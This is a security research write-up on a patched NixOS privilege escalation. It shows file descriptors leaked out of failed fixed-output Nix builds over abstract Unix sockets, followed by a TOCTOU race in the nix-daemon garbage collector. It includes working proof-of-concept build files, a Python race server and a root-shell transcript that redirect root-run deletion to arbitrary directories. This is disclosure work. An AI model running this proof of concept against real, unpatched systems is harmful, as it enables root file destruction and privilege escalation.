NixOS: Declarative Management, Imperative Privilege Escalation - Deep Dive with Snyk Labs

These vulnerabilities have been patched by the NixOS, Lix, and Guix teams. To make sure you’re safe, update as described in the respective advisory posts.

In this post, we will deep-dive into discovering and exploiting this privilege escalation in stock NixOS.

If you’ve not seen my previous privilege escalation work, or any classic Linux privilege escalations, please let me introduce you to ‘unhelpfully named shell script with vague output statements’:

$ id
uid=1000(rory) gid=100(users) groups=100(users)
$ sh privesc.sh
waiting for dir creation
delracer running
pam server running
waiting for file creation
writing pam su
waiting for nixbld1
cleaning up
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell

[root@vr-nixos:/home/rory/privesc]# id
uid=0(root) gid=0(root) groups=0(root)

What is NixOS?

NixOS is described by Wikipedia as “a Linux distribution based on a package manager named Nix. NixOS uses an immutable design and an atomic update model. Its use of a declarative programming configuration system allows reproducibility and portability.”

NixOS is a Linux distribution, like Ubuntu, Debian, or Arch Linux. The key variation, and what makes NixOS particularly interesting, is that the entire system can be configured from a single file. Gone are the days of hand editing tens of configuration files in /etc. The tightly coupled Nix package manager means you can create as many environments as you like with any combination of packages available in your $PATH. Think Python virtual environments, but for the whole system. As a researcher, this is great for experimentation, as I can bring in a selection of packages to play with, then, when I’m done, I can simply call the garbage collector, and it’s all gone.

Using NixOS on my various personal servers caused me to wonder if there were opportunities for vulnerabilities. NixOS has a very privileged daemon that contains a lot of functionality, and I’m nothing if not a lover of Linux privilege escalation.

Gadget intro: Unix domain sockets

Before we begin, it’s worth talking briefly about Unix domain sockets. They are a critical part of this privilege escalation, and are generally a very handy gadget to have in your toolkit when looking at exploiting Linux in general.

The long and the short of it is that Unix domain sockets are a type of socket available on Linux (and others) which allows communication between processes. Much like IPv4 (AF_INET) or IPv6 (AF_INET6), which you have probably seen before, Unix sockets (AF_UNIX) give you a file descriptor you can read and write to. The most common case is for system-local services, think systemd, dbus, or anything that might have an interface you’d like to interact with, to listen on a file path which you can connect to, much like you would an IP address or domain name. There is a second, lesser-used (in my experience) subtype of these sockets, known as ‘abstract’ Unix domain sockets. These sockets are used in much the same way, but the first byte of their address is null, and they are not part of the filesystem.
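As a minimal sketch of the abstract variant, the following Python binds a listener in the abstract namespace (note the leading NUL byte in the address), connects to it, and passes one message across. The socket name is a hypothetical placeholder, and abstract sockets are Linux-specific, so this is an illustration under those assumptions rather than portable code.

```python
import os
import socket


def abstract_socket_roundtrip(name: str) -> bytes:
    """Bind an abstract Unix socket, connect to it, and pass one message (Linux only)."""
    address = "\0" + name  # the leading NUL byte selects the abstract namespace
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        server.bind(address)      # no file is created on disk
        server.listen(1)
        client.connect(address)   # queued in the backlog until accept()
        conn, _ = server.accept()
        with conn:
            client.sendall(b"ping")
            return conn.recv(4)
    finally:
        client.close()
        server.close()


# Hypothetical name; the PID just keeps it unique between runs.
print(abstract_socket_roundtrip(f"demo-{os.getpid()}"))
```

Because nothing is created in the filesystem, there is no socket file to clean up afterwards: the address disappears once the listening socket is closed.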

Such sockets, I hear you yell, are basically the same as a TCP socket, are they not? TCP sockets also are not part of the filesystem, what’s special about Unix sockets? The interesting feature of Unix sockets is SCM_RIGHTS. SCM_RIGHTS allows you to send a special ancillary message across a connected socket that contains file descriptors.
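To make SCM_RIGHTS concrete, here is a small self-contained sketch that passes an open file descriptor across a connected pair of Unix sockets. It assumes Python 3.9 or newer for the socket.send_fds and socket.recv_fds helpers, and it keeps both ends in one process purely for brevity; in practice the two ends would live in different processes.

```python
import os
import socket
import tempfile


def pass_fd_demo() -> bytes:
    """Send an open file descriptor over a Unix socket pair and read through the copy."""
    sender, receiver = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        with tempfile.TemporaryFile() as f:
            f.write(b"hello from the sender")
            f.flush()
            # The kernel attaches the descriptor as SCM_RIGHTS ancillary data.
            socket.send_fds(sender, [b"x"], [f.fileno()])
        # The sender's copy is closed now; the in-flight copy keeps the file open.
        _data, fds, _flags, _addr = socket.recv_fds(receiver, 1, 1)
        fd = fds[0]
        try:
            os.lseek(fd, 0, os.SEEK_SET)  # the file offset is shared with the sender
            return os.read(fd, 100)
        finally:
            os.close(fd)
    finally:
        sender.close()
        receiver.close()


print(pass_fd_demo())
```

The receiver never needed permission to open the file itself. It simply inherits whatever access the sender had when it opened the descriptor, which is the property the rest of this post leans on.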

So I can have two cooperating processes, opening files and passing them between each other. At first glance, this sounds pretty boring. If I’m privileged enough to open an interesting file descriptor, why would I bother to send it somewhere else? Well, dear reader, consider what happens when you can open files as an even lower-privileged user: a sandboxed user with less access and fewer privileges than normal. Critically, this is a sandbox user whose entire sandbox is built by a higher-privileged process and torn down by that same process. What, then, can we do with a file descriptor that such a lower-privileged process can create, for something that is then cleaned up once that process exits?

Exfiltrating file descriptors from a sandbox, which assumes that the sandboxed process is the only thing with access, can result in some very exploitable behaviour.

In the following sections, we will see how the combination of exfiltrated, low-privileged file descriptors and some race condition magic can result in reliable exploitation to achieve full root command execution.

A note on prior art: This research was done without looking up previous vulnerabilities in NixOS; however, during reporting, it was identified that one of the key components of the vulnerability chain was actually already known (and previously fixed), identified as GHSA-2ffj-w4mj-pg37. Whilst we discovered this independently, I think it’s worth noting that we were not first in this area.

Failed builds, our first stepping stone

The Nix store

NixOS (and the Nix package manager in general) has a tightly controlled ‘store’, which keeps local copies of packages, artifacts, and other system files. On the NixOS system, this is analogous to /bin, /etc, /usr, and /lib combined. All files on the filesystem are symbolically linked to the Nix store or directly reference the store (for example, you won’t find /bin in your $PATH, but sh is still available). Anyone can add things to the store, but once there, they cannot be changed. Files are content-addressed; there is a hash in the top-level directory inside /nix/store, so if your input changes, your item (be it a software build, configuration file, or derivation) will end up in a different location. The Nix store is owned by root, and they’ve even gone as far as to ensure that the store is a read-only directory mount in the root namespace, so even a normal root process cannot write here:

# id
uid=0(root) gid=0(root) groups=0(root)
# touch /nix/store/TEST
touch: cannot touch '/nix/store/TEST': Read-only file system

This is great for security, and it protects against several potential attacks related to overwriting key files referenced elsewhere in the system. As noted above, however, anyone can add new content to the store:

$ echo mycontents > myfile
$ nix-store --add myfile
/nix/store/izb09cpzmfmn8q5xg6pzgbcz1cpcwm5v-myfile
$ cat /nix/store/izb09cpzmfmn8q5xg6pzgbcz1cpcwm5v-myfile
mycontents

This piqued my interest. Since the store is owned and managed by a privileged process, I wondered if there were vulnerabilities in the way files in the store were handled, so I set out to explore the methods used to get files into the store. Getting static files into the store was easy: as seen above, a simple command can import them. But static files in the store aren’t useful to an attacker if nobody ever references or uses them.

Nix builds

Looking at other ways files end up in the store, I came across the Nix build functionality. This allows any user (in the default configuration) to run arbitrary sandboxed software builds, where the outputs are added to the Nix store. The build files are written in the Nix declarative language. You can see in the following example that we simply create the output directory and write a file to it, which ends up in the Nix store.

$ cat build.nix
let
  pkgs = import <nixpkgs> { };
in
pkgs.stdenv.mkDerivation {
  name = "demo";
  builder = "/bin/sh";
  args = ["-c" "${pkgs.coreutils}/bin/mkdir $out && echo 'built' > $out/built"];
  outputs = ["out"];
  system = builtins.currentSystem;
}
$ nix-build build.nix
this derivation will be built:
  /nix/store/3y8l6r3r08zshrfx0917xsdbylli6ynj-demo.drv
building '/nix/store/3y8l6r3r08zshrfx0917xsdbylli6ynj-demo.drv'...
/nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
$ ls -ld /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
dr-xr-xr-x 2 root root 4096 Jan  1  1970 /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
$ ls -l /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo
total 4
-r--r--r-- 1 root root 6 Jan  1  1970 built
$ cat /nix/store/ydgmd2mh0grq21jfb0w2hqzfyqd9hmvp-demo/built
built

There is a lot of complexity to Nix builds, and there are many, many (well-documented) options for configuring builds of any software you desire. For this post, however, we will stick with the very simple build.nix shown above.

Strange permissions

The first step towards our goal of privilege escalation came about by accident. After banging my head against the wall, finding nothing for quite a while, I took a break to look around the system to try and drum up some ideas. By pure luck, I noticed that one of the files in the nix store had a username that did not match the rest:

$ ls -l /nix/store
…
-r--r--r--  2 root    root       1432 Jan  1  1970 ar2ybwglky399nhxdmhd9yaf7ha3nc8l-libraw1394-2.1.2.drv
-r--r--r--  2 root    root       3471 Jan  1  1970 ar5rw3lmcbwfs6k4jv7c9afrwwj9775c-source.drv
drwxr-xr-x  2 nixbld1 nixbld     4096 Apr  2 17:00 ar8g4g3ig1q76a9an09nq6xghq8prky2-demo
-rw-------  1 root    root          0 Apr  2 17:00 ar8g4g3ig1q76a9an09nq6xghq8prky2-demo.lock
-r--r--r--  2 root    root       1776 Jan  1  1970 ara6s1vbng0ilh9mdy80rfp04387s0gq-ansi_term-0.12.1.drv
…

The nixbld1 user is one of the sandboxed users that the Nix daemon uses to perform the builds we looked at above. The actual build stage is executed as this user before the files are imported into the store and set to be owned by root. Digging back through my notes, I identified the cause of this different behaviour: failed builds. When a build fails, due to a non-zero exit code in the builder process, the contents of the output directory are made available in the Nix store, along with the temporary build directory, to aid in debugging build failures. Taking out our trusty strace tool, I confirmed that this is the same output directory moved from the sandbox root used by the builder. This set off alarm bells in my mind, as we can control what the nixbld1 user does while the process exists, and the fact that the output directory is moved means that we might be able to retain access even after the sandbox is cleaned up. Being able to modify things inside /nix/store is not intended, given the amount of protections it has, so this looks like a strong place to start with our exploitation.

We, of course, need to validate our idea. As alluded to above, one way we can go about this is by utilizing Unix sockets. If the nixbld1 user we control can pass a file descriptor for the output directory to a process we control outside the build sandbox, we may be able to retain write access to this directory even after it has been imported into the Nix store. Normal Nix builds are performed inside a build sandbox, which includes a network sandbox. File-based Unix sockets conveniently bypass the isolation of network namespaces, but there are no shared disk locations where we could place one, so we have to use abstract Unix domain sockets, which do not rely on shared disk locations. Abstract sockets, however, are scoped to a network namespace, so a builder confined to its own network namespace cannot reach a listener outside it.

Nix builds offer a second, slightly less restrictive type of sandbox for use in ‘Fixed output derivations’. These build types are expected to retrieve files from the internet (for example, cloning a git repository for later building); as such, they are not isolated in a network namespace and are instead in the main network namespace, meaning that we can use abstract Unix sockets. In general, these build types require a valid hash for the downloaded content for a successful build, to ensure the reproducibility of the build as a whole. However, since we want the build to fail anyway, we don’t need to think about this requirement and can instead pass a dummy value.

Our only other requirement is appropriate code to pass a file descriptor between the sandboxed process and another process we control. This is pretty easy to do with a Python one-liner, meaning we don’t need to mess with complicated C code to do the same thing.

Testing the theory

Our test code for this step looks like this:

let
  pkgs = import <nixpkgs> { };
in
pkgs.stdenv.mkDerivation {
  name = "demo";
  builder = "/bin/sh";
  args = ["-c" ''
echo $out
${pkgs.coreutils}/bin/mkdir $out
${pkgs.coreutils}/bin/chmod 777 $out
${pkgs.python3}/bin/python -c '
import socket,os,array
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect(chr(0) +"DEMO")
s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])
'
false
''];
  system = builtins.currentSystem;
  outputs = ["out"];
  outputHash = pkgs.lib.fakeHash;
  outputHashMode = "recursive";
}

We create the output directory (handily provided to the builder in the $out environment variable), make it world-writable (since we’re running as nixbld1 and still beholden to Unix permission checks), and then use Python to send an O_PATH file descriptor for it to an abstract Unix socket listening at the address ‘DEMO’. We also echo the output directory to aid manual validation later: the path contains a hash which, while it can be calculated, is easier to just output and copy. Notice that we also define outputHash and outputHashMode, which mark this build as a fixed-output derivation, causing the network namespace to be shared.

The corresponding Unix socket server looks like this:

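import socket, os, array

# Listen on the abstract Unix socket "DEMO" (leading NUL byte, no file on disk)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.bind(chr(0) + "DEMO")
s.listen(1)
c, _ = s.accept()
# Receive one byte of data plus room for a single 4-byte file descriptor
data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
# ancdata[0] is (level, type, payload); the payload holds the fd as a native int
received_fd = int.from_bytes(ancdata[0][2], "little")
# Enter the directory behind the descriptor and hand over an interactive shell
os.fchdir(received_fd)
os.system("/bin/sh")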

This server simply receives the file descriptor sent by the builder user, changes into the directory, and runs a shell. This is a super simple way of giving interactive access to the directory for testing purposes.
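The server above decodes the descriptor by hand, assuming exactly one 4-byte little-endian integer in the first ancillary message. As a slightly more defensive sketch (not part of the original proof of concept), the helper below walks every ancillary message and decodes any SCM_RIGHTS payload using the platform's native int size. The function name fds_from_ancdata is an assumption made for illustration.

```python
import array
import socket


def fds_from_ancdata(ancdata):
    """Return every file descriptor carried in SCM_RIGHTS ancillary messages."""
    fds = array.array("i")  # native C int, matching how the kernel packs descriptors
    for level, kind, payload in ancdata:
        if level == socket.SOL_SOCKET and kind == socket.SCM_RIGHTS:
            # Ignore any trailing partial integer left by a truncated message.
            usable = len(payload) - (len(payload) % fds.itemsize)
            fds.frombytes(payload[:usable])
    return list(fds)


# Hand-built ancillary data standing in for the second value returned by recvmsg().
sample = [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [7, 9]).tobytes())]
print(fds_from_ancdata(sample))
```

In the server, the call would look like received_fd = fds_from_ancdata(ancdata)[0], with the rest of the script unchanged.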

Running the server and the build process at the same time results in an interactive shell inside the build output directory. Using this shell, we can create new files and confirm that we have write access to the output directory inside the Nix store after the build process has finished:

$ nix-build build.nix
this derivation will be built:
  /nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv
building '/nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv'...
/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
error: builder for '/nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv' failed with exit code 1;
       last 1 log lines:
       > /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
       For full logs, run 'nix-store -l /nix/store/85hdsr24vl8cgp03wc4wpa3cwb2v245g-demo.drv'.
$ ls -l /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
total 0

[Concurrently, in another shell]
$ python server.py
sh-5.2$ ls -ld .
drwxrwxrwx 2 nixbld1 nixbld 4096 Apr  2 17:27 .
sh-5.2$ touch EXPLOIT_SUCCESSFUL

[Back in the first shell]
$ ls -l /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
total 0
-rw-r--r-- 1 rory users 0 Apr  2 17:28 EXPLOIT_SUCCESSFUL

What we’ve shown here is that a fixed-output derivation build, together with a cooperating server outside the build sandbox, can retain write access to a path inside the /nix/store directory and modify it after the fact. The next step is to find an action performed by a privileged process, probably the Nix daemon, which assumes that directories inside /nix/store cannot change during processing. Given the subverted expectation that /nix/store is immutable, I thought it likely that there would be exploitable race conditions accessible somewhere.

Hunting impact

The ability to modify files nobody will ever look at is, frankly, useless. So begins the hunt for something we can trigger that touches the path we’ve just shown we can control. As always, strace is my tool of choice. For an introduction to strace, see the Leaky Vessels Deep Dive, where I went into detail about what it is and how to use it effectively.

Garbage collection

The Nix store doesn’t automatically delete items it contains, but after a while, it can contain a lot of unused files, possibly from previous builds, or older versions of applications. You can therefore call the garbage collector, which will find unreferenced files and remove them. A ‘referenced’ file could be actively in use by a running environment, or referenced by a permanent environment, such as the system itself. It wouldn’t do to delete the active Linux kernel, completely breaking your install, so this package is referenced up to a garbage collection ‘root’, which will stop it from being removed. Our test builds thus far are not used by the system or any environment, so when the garbage collector is called, they will be removed. We can see this as follows:
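The idea of "referenced up to a root" can be pictured with a toy reachability model. This is only an illustration of the concept, not how the Nix garbage collector is implemented, and the store path names below are made up for the example.

```python
def find_garbage(references, roots):
    """Return store entries that cannot be reached from any garbage collection root."""
    live = set()
    stack = list(roots)
    while stack:
        path = stack.pop()
        if path in live:
            continue
        live.add(path)
        # Everything a live path refers to is live as well.
        stack.extend(references.get(path, ()))
    return sorted(set(references) - live)


# Hypothetical store: each entry maps to the entries it references.
store = {
    "system": ["kernel", "bash"],
    "kernel": [],
    "bash": ["glibc"],
    "glibc": [],
    "demo": [],       # failed build output, referenced by nothing
    "demo.drv": [],   # its derivation file
}
print(find_garbage(store, roots=["system"]))
```

In this model the kernel survives because the system root reaches it, while the demo output and its .drv are unreachable and would be collected.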

$ nix-build build.nix
this derivation will be built:
  /nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv
building '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'...
/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
error: builder for '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv' failed with exit code 1;
       last 1 log lines:
       > /nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo
       For full logs, run 'nix-store -l /nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'.
$ nix-collect-garbage
finding garbage collector roots...
deleting garbage...
deleting '/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo'
deleting '/nix/store/jyzg0qga1qd4w8ydszcfxzmimxm6fldx-demo.lock'
deleting '/nix/store/3rka31dn4zp9vyzywb1l74mflxfcq17w-demo.drv'
deleting unused links...
note: currently hard linking saves 38.53 MiB
3 store paths deleted, 0.00 MiB freed

Examining the behavior

Observe that the directory we created (/nix/store/jyz…-demo) is deleted, along with a couple of other related files (the lockfile, still present because of the build failure, and the .drv, which is a serialized format of the build.nix). We know from above that we could be in control of the /nix/store/jyz…-demo directory as it is being deleted. Creating a test directory structure under our output directory inside the build (with mkdir $out/a/b and touch $out/a/b/c) and re-running the garbage collection with the daemon under strace yields the following:

$ strace -p $(pidof nix-daemon) -f -s 262144 -yy
…
newfstatat(15</nix/store>, "[hash]-demo", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(15</nix/store>, "/nix/store/[hash]-demo", O_RDONLY) = 16</nix/store/[hash]-demo>
fstat(16</nix/store/[hash]-demo>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(16</nix/store/[hash]-demo>, 0x55fca913cca0 /* 3 entries */, 32768) = 72
newfstatat(16</nix/store/[hash]-demo>, "a", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(16</nix/store/[hash]-demo>, "/nix/store/[hash]-demo/a", O_RDONLY) = 17</nix/store/[hash]-demo/a>
fstat(17</nix/store/[hash]-demo/a>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(17</nix/store/[hash]-demo/a>, 0x55fca9144ce0 /* 3 entries */, 32768) = 72
newfstatat(17</nix/store/[hash]-demo/a>, "b", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0
openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>
fstat(18</nix/store/[hash]-demo/a/b>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
getdents64(18</nix/store/[hash]-demo/a/b>, 0x55fca914cd20 /* 3 entries */, 32768) = 72
newfstatat(18</nix/store/[hash]-demo/a/b>, "c", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
unlinkat(18</nix/store/[hash]-demo/a/b>, "c", 0) = 0

This output is pretty dense, but we can read from it that the daemon recursively enters the directories flagged for deletion, iterating over the files (listed with the getdents64 syscall), checking their type (with the newfstatat call), and either recursing into the entry if it’s a directory or unlinking it if it’s a file. Technically, reading syscalls directly like this requires a lot of assumptions: we don’t know for certain that it’s checking their type using the output of newfstatat, but given the context, and the way this kind of code is usually written, we can make an educated guess. A quick look at the source code confirms this reading, from nix/src/libutil/file-system.cc:_deletePath:

static void _deletePath(Descriptor parentfd, const fs::path & path, uint64_t & bytesFreed)
{
[...]
    std::string name(baseNameOf(path.native()));

    struct stat st;
    if (fstatat(parentfd, name.c_str(), &st,
            AT_SYMLINK_NOFOLLOW) == -1) {
[...]
    }

[...]

    if (S_ISDIR(st.st_mode)) {
[...]

        int fd = openat(parentfd, path.c_str(), O_RDONLY);
[...]
        AutoCloseDir dir(fdopendir(fd));
[...]

        struct dirent * dirent;
        while (errno = 0, dirent = readdir(dir.get())) { /* sic */
            checkInterrupt();
            std::string childName = dirent->d_name;
            if (childName == "." || childName == "..") continue;
            _deletePath(dirfd(dir.get()), path + "/" + childName, bytesFreed);
        }
[...]
    }

[...]
    if (unlinkat(parentfd, name.c_str(), flags) == -1) {
[...]
    }
[...]
}

The vulnerability we’re looking for is already present in the strace output. Have you spotted it? The code seems pretty safe: it uses the *at family of calls to open paths by name relative to a directory, and it’s almost perfect. Used correctly, the *at family of calls can make this kind of exploitation impossible, since if you’re holding file descriptors and checking against the file descriptors themselves, things can’t change under you. There is just one error: the openat calls use a full path as their second argument. They do pass a file descriptor as the first argument, though, so shouldn’t this be OK?

From the openat(2) manpage:

If pathname is absolute, then dirfd is ignored.
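This behaviour is easy to confirm from Python, where os.open with the dir_fd parameter maps onto openat. The sketch below builds two hypothetical directories, "checked" and "other", holds a descriptor for the first, and then opens a file by relative name and by absolute path. It is an illustration in a temporary directory and touches nothing Nix-related.

```python
import os
import tempfile


def open_and_read(dir_fd, pathname):
    """openat(dir_fd, pathname, O_RDONLY), then read a few bytes."""
    fd = os.open(pathname, os.O_RDONLY, dir_fd=dir_fd)
    try:
        return os.read(fd, 64)
    finally:
        os.close(fd)


def absolute_path_ignores_dirfd():
    with tempfile.TemporaryDirectory() as tmp:
        checked = os.path.join(tmp, "checked")
        other = os.path.join(tmp, "other")
        for directory, content in ((checked, b"checked"), (other, b"other")):
            os.mkdir(directory)
            with open(os.path.join(directory, "f"), "wb") as fh:
                fh.write(content)

        dir_fd = os.open(checked, os.O_RDONLY | os.O_DIRECTORY)
        try:
            relative = open_and_read(dir_fd, "f")                      # resolved under dir_fd
            absolute = open_and_read(dir_fd, os.path.join(other, "f"))  # dir_fd is ignored
        finally:
            os.close(dir_fd)
    return relative, absolute


print(absolute_path_ignores_dirfd())
```

The relative open stays inside the directory we hold a descriptor for, while the absolute open goes wherever the path currently leads, regardless of the descriptor passed alongside it.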

Absolute paths?

So the openat calls ignore the passed directory file descriptor. Let's look closely at just one section of the strace output to see how we can exploit this:

First, our directory ‘b’ is examined to see its type

4119502 newfstatat(17</nix/store/[hash]-demo/a>, "b", {st_mode=S_IFDIR|0755, st_size=4096, ...}, AT_SYMLINK_NOFOLLOW) = 0

Next, we open the directory so we have a directory file handle (18) we can use later

4119502 openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>

Double-check that the file descriptor hasn’t changed under us, and is still a directory

4119502 fstat(18</nix/store/[hash]-demo/a/b>, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

Finally, iterate over the directory and delete its contents. In this case, a file called ‘c’

4119502 getdents64(18</nix/store/[hash]-demo/a/b>, 0x55fca914cd20 /* 3 entries */, 32768) = 72
4119502 newfstatat(18</nix/store/[hash]-demo/a/b>, "c", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
4119502 unlinkat(18</nix/store/[hash]-demo/a/b>, "c", 0) = 0

Consider what would happen if the directory ‘a’ changes while this process is running. Even though the process has already checked the directory ‘a’ (omitted here, but it’s done the same way as the directory ‘b’) and is reusing the same file handle that it’s already checked with fstat, the absolute path passed to openat throws all that away and opens a path that could have changed since it was checked. This is a classic Time Of Check, Time Of Use (or TOCTOU) vulnerability.
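The check-then-use gap can be reproduced deterministically, without any racing, by performing the swap between the two steps by hand. The sketch below is a simplified stand-in for the daemon's sequence and runs entirely inside a temporary directory. The layout (out/a/b, out/z.new/b, target) is hypothetical, and for brevity ‘b’ itself is the symbolic link here.

```python
import os
import stat
import tempfile


def simulate_swap():
    """Check 'b' relative to a held fd, swap the parent, then open by absolute path."""
    with tempfile.TemporaryDirectory() as tmp:
        out = os.path.join(tmp, "out")
        target = os.path.join(tmp, "target")
        os.makedirs(os.path.join(out, "a", "b"))
        os.makedirs(os.path.join(out, "z.new"))
        os.mkdir(target)
        os.symlink(target, os.path.join(out, "z.new", "b"))

        a_fd = os.open(os.path.join(out, "a"), os.O_RDONLY | os.O_DIRECTORY)
        try:
            # Time of check: 'b' is a real directory under the fd we hold.
            st = os.stat("b", dir_fd=a_fd, follow_symlinks=False)
            checked_is_dir = stat.S_ISDIR(st.st_mode)

            # The attacker swaps the parent directory between check and use.
            os.rename(os.path.join(out, "a"), os.path.join(out, "a.old"))
            os.rename(os.path.join(out, "z.new"), os.path.join(out, "a"))

            # Time of use: the absolute path is re-resolved and a_fd is ignored.
            unsafe_fd = os.open(os.path.join(out, "a", "b"), os.O_RDONLY, dir_fd=a_fd)
            # A relative open stays under the directory that was checked.
            safe_fd = os.open("b", os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=a_fd)
            try:
                target_st = os.stat(target)
                unsafe_hit = os.path.samestat(os.fstat(unsafe_fd), target_st)
                safe_hit = os.path.samestat(os.fstat(safe_fd), target_st)
            finally:
                os.close(unsafe_fd)
                os.close(safe_fd)
        finally:
            os.close(a_fd)
    return checked_is_dir, unsafe_hit, safe_hit


print(simulate_swap())
```

The three values say: the check passed, the absolute-path open landed in the attacker's target, and the relative open did not.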

Crafting a proof of concept

To test for and later exploit this vulnerability, we need to set up a crafted output directory. There are a few criteria we must meet to write our proof of concept:

1. We need to be able to modify the directory structure while the garbage collector is running
2. We need a nested directory structure such that we can replace a directory with a symbolic link higher up in the path, while lower components are being processed
3. We need to know the specific timing of when we should perform the replacement, and we need enough time to do so reliably
4. We need something safe to target while we test

For item 1, we have our vulnerability from above. We can create the output directory and make it world-writable, then pass a file descriptor to another process we control to make modifications at the correct time. Item 2 is relatively simple to create as well; we can simply create the directory structure $out/a/b containing some files, which will be deleted. At the appropriate time, the directory ‘a’ can be replaced with another, causing the openat calls to be redirected via symbolic links we control. The directory structure can also aid us with item 3. By filling the nested directory with a large number of files, which will take some time to process, we can watch this directory for the deletion of any files; when this occurs, we know that the processing is taking place and that we’re inside the race condition window. At this point, there should also be enough files remaining that we have the time to swap out the directory ‘a’ with a different directory we control. Finally, for item 4, we can create a new directory somewhere and fill it with sample files, which we will hopefully see deleted.

Putting this all together, we end up with a proof of concept build file and service like the following:

let
  pkgs = import <nixpkgs> { };
in
pkgs.stdenv.mkDerivation {
  name = "test00006";
  builder = "/bin/bash";
  args = ["-c" ''
echo $out
TARGET=/tmp/deleteme
${pkgs.coreutils}/bin/mkdir -p $out/a/b/a{0000..1000}
${pkgs.coreutils}/bin/mkdir -p $out/z.new/b/

for i in {0000..1000}; do
        ${pkgs.coreutils}/bin/ln -s $TARGET $out/z.new/b/a$i
done

${pkgs.coreutils}/bin/chmod 777 $out
${pkgs.python3}/bin/python -c 'import socket,os,array;s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); s.connect(chr(0) +"DEMO");s.sendmsg([b"A"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [os.open(os.environ["out"], os.O_PATH)]))])'
false
''];
  system = builtins.currentSystem;
  outputHash = pkgs.lib.fakeHash;
  outputHashMode = "recursive";
}

And the corresponding server:

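import socket, os, array

# Receive the output directory's file descriptor from the builder, as before
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.bind(chr(0) + "DEMO")
s.listen(1)
c, _ = s.accept()
data, ancdata, flags, addr = c.recvmsg(1, socket.CMSG_LEN(4))
received_fd = int.from_bytes(ancdata[0][2], "little")
os.fchdir(received_fd)

# Busy-wait until the garbage collector deletes a0000: we are now inside the race window
while os.path.exists("a/b/a0000"):
    ...
# Swap the real directory for the one full of symbolic links
os.rename("a", "a.old")
os.rename("z.new", "a")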

We create 1,001 directories, $out/a/b/a0000 to $out/a/b/a1000; these will hopefully be the directories processed first (getdents64 does not return entries in a reliable order). The large number of directories lets us watch for one specific deletion and replace the directory $out/a while the rest are being deleted. We also create the directory $out/z.new/b, named so that it sorts lexicographically after $out/a and is hopefully processed later (or not at all if our exploit is successful). We then fill this ‘new’ directory with 1,001 symbolic links matching the names of our first set of directories. The race targets the moment the Nix daemon performs the open, expecting the directory it has already validated, as we saw above:

4119502 openat(17</nix/store/[hash]-demo/a>, "/nix/store/[hash]-demo/a/b", O_RDONLY) = 18</nix/store/[hash]-demo/a/b>

The Python server will wait for a connection, receive the file descriptor for the output directory, watch for the file $out/a/b/a0000 to be deleted, indicating it is inside the race condition window, and then swap the a and z.new directories.

The hope is that we have been able to replace the directory ‘a’ with a new directory we control, such that the entries being opened under ‘b’ are symbolic links to another directory we wish to target. The process would be thus:

nix-daemon progresses through its recursive deletion until it looks in $out/a/b
It will start deleting the directories a0000, a0001, etc. It will recurse inside each directory, scan for nested files to delete (finding none in the directory structure), then delete the directory a0000, etc.
At some point during this process, $out/a is moved out of the way and replaced with $out/z.new. Directories at the absolute path ending $out/a/b/a0500 (etc) are now symbolic links to our target directory (/tmp/deleteme in our proof of concept)
The nix-daemon will not notice this change, as it is still checking files relative to the old $out/a
When the nix-daemon performs the openat call, it will traverse our a0500 symbolic link, opening an arbitrary directory and recursing inside
The nix-daemon will happily empty the directory we have pointed it at, deleting files as root.
